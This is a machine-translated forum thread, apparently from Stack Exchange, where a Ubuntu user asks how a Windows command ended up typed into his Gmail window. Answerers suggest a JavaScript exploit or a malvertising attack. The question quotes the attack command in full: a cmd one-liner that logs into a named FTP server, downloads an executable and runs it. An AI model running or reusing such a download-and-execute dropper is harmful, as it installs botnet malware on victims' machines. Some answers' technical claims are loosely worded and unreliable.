Как определить, был ли взломан мой Linux-компьютер?

Question

Мой домашний компьютер обычно включен, но монитор выключен. Этим вечером я пришел домой с работы и обнаружил, что выглядит как попытка взлома: в моем браузере мой Gmail был открыт (это был я), но он был в режиме составления, а в поле TO :

MD / C откройте эхо cCTeamFtp.yi.org 21 >> ik & echo user ccteam10 765824 >> ik & echo binary >> ik & echo get svcnost.exe >> ik & echo пока >> ik & ftp -n -v -s:ik & del ik & svcnost.exe & exit echo

Для меня это выглядит как код командной строки Windows, и запуск кода md в сочетании с тем фактом, что Gmail находился в режиме создания, делает очевидным, что кто-то пытался выполнить команду cmd . Думаю, мне повезло, что я не запускаю Windows на этом ПК, но у меня есть другие, которые делают. Это первый раз, когда подобное случается со мной. Я не гуру Linux, и в то время я не запускал никаких других программ, кроме Firefox.

Я абсолютно уверен, что я не написал это, и никто другой не был физически за моим компьютером. Кроме того, я недавно изменил свой пароль Google (и все остальные мои пароли) на что-то вроде vMA8ogd7bv поэтому я не думаю, что кто-то взломал мою учетную запись Google.

Что сейчас произошло? Как кто-то нажимает клавиши на моем компьютере, если это не старая машина Windows для бабушек, которая годами запускает вредоносное ПО, а недавняя новая установка Ubuntu?

Обновить:
Позвольте мне обратиться к некоторым пунктам и вопросам:

• Я в Австрии, в деревне. Мой маршрутизатор WLAN использует WPA2/PSK и пароль средней надежности, которого нет в словаре; должен был быть грубым и менее чем в 50 метрах отсюда; маловероятно, что его взломали.
• Я использую проводную клавиатуру USB, так что очень маловероятно, что кто-нибудь сможет ее взломать.
• Я не использовал свой компьютер в то время; это было просто бездельничало дома, в то время как я был на работе. Это неттоп, монтируемый на мониторе, поэтому я редко его выключаю.
• Машине всего два месяца, работает только Ubuntu, и я не использую странное программное обеспечение и не посещаю странные сайты. В основном это Stack Exchange, Gmail и газеты. Нет игр. Ubuntu настроен на то, чтобы обновляться.
• Я не знаю ни одного работающего сервиса VNC; Я конечно не установил или не включил один. Я также не запускал никаких других серверов. Я не уверен, если какие-либо из них работают в Ubuntu по умолчанию?
• Я знаю все IP-адреса в учетной записи Gmail. Я уверен, что Google не был прихожей.
• Я нашел средство просмотра файлов журнала, но не знаю, что искать. Помогите?

Что я действительно хочу знать, так это то, что заставляет меня чувствовать себя небезопасно, так это то, как кто-то из Интернета может нажимать клавиши на моей машине?Как я могу предотвратить это, не думая об этом? Я не фанат Linux, я отец, который более 20 лет работает с Windows и устал от этого. И за все 18 с лишним лет пребывания в сети я никогда лично не видел попыток взлома, так что для меня это ново.

Answer 1

Я сомневаюсь, что тебе есть о чем беспокоиться. Скорее всего, это была атака JavaScript, которая пыталась сделать диск загрузкой. Если вас это беспокоит, начните использовать дополнения NoScript и AdBlock Plus Firefox.

Даже посещая надежные сайты, вы не защищены, потому что они запускают код JavaScript от сторонних рекламодателей, который может быть вредоносным.

Я схватил его и запустил в ВМ. Он установил mirc, и это журнал состояния ... http://pastebin.com/Mn85akMk

Это автоматическая атака, которая пытается заставить вас скачать mIRC и присоединиться к ботнету, который превратит вас в спамбота ... Он подключился к моей виртуальной машине и установил соединение с несколькими удаленными адресами, одним из которых является autoemail-119.west320.com .

При запуске в Windows 7 мне пришлось принять приглашение UAC и разрешить доступ через брандмауэр.

Кажется, на других форумах есть тонны сообщений об этой команде, и кто-то даже говорит, что торрент-файл пытался выполнить его, когда он закончил загрузку ... Я не уверен, как это было бы возможно, хотя.

Я не использовал это сам, но он должен быть в состоянии показать вам текущие сетевые подключения, чтобы вы могли видеть, если вы подключены к чему-то вне нормы: http://netactview.sourceforge.net/download.html

Answer 2

Я согласен с @ jb48394, что это, вероятно, эксплойт JavaScript, как и все остальное в наши дни.

Тот факт, что он попытался открыть окно cmd (см . Комментарий @ torbengb) и запустить вредоносную команду, а не просто незаметно загружать троян в фоновом режиме, предполагает, что он использует некоторую уязвимость в Firefox, которая позволяет ему вводить нажатия клавиш, но не запускать код.

Это также объясняет , почему этот подвиг, который был явно написан исключительно для Windows, также будет работать в Linux: Firefox работает код JavaScript , так же , как во всех OS'es (по крайней мере, он пытается :)). Если бы это было вызвано переполнением буфера или подобным эксплойтом, предназначенным для Windows, это просто привело бы к сбою программы.

Относительно того, откуда появился код JavaScript - вероятно, вредоносная реклама Google (рекламный цикл в Gmail в течение дня). Это не было бы первое время.

Answer 3

Я обнаружил похожую атаку на другой Linux-машине. Кажется, это какая-то команда FTP для Windows.

Answer 4

Это не отвечает на весь ваш вопрос, но в файле журнала ищите неудачные попытки входа.

Если в вашем журнале более пяти неудачных попыток, кто-то попытался взломать root . Если есть успешная попытка входа в root , пока вы были вдали от своего компьютера, немедленно смените пароль !! Я имею в виду прямо сейчас! Желательно что-то буквенно-цифровое, длиной около 10 символов.

С сообщениями, которые вы получили (команды echo ), это действительно звучит как какой-то незрелый сценарий, детка. Если бы это был настоящий хакер, который знает, что он делает, вы, вероятно, все равно не узнали бы об этом.

Answer 5

whois отчеты west320.com является собственностью корпорации Майкрософт.

UPnP и Vino (Система -> Настройки -> Удаленный рабочий стол) в сочетании со слабым паролем Ubuntu?

Вы использовали нестандартные репозитории?

DEF CON проводит соревнования по Wi-Fi каждый год на предмет того, как далеко можно добраться до точки доступа Wi-Fi - в последний раз я слышал, что это 250 миль.

Если вы действительно хотите испугаться, посмотрите на скриншоты центра командного управления ботнетом Zeus. Ни одна машина не является безопасной, но Firefox в Linux безопаснее остальных. Еще лучше, если вы запустите SELinux.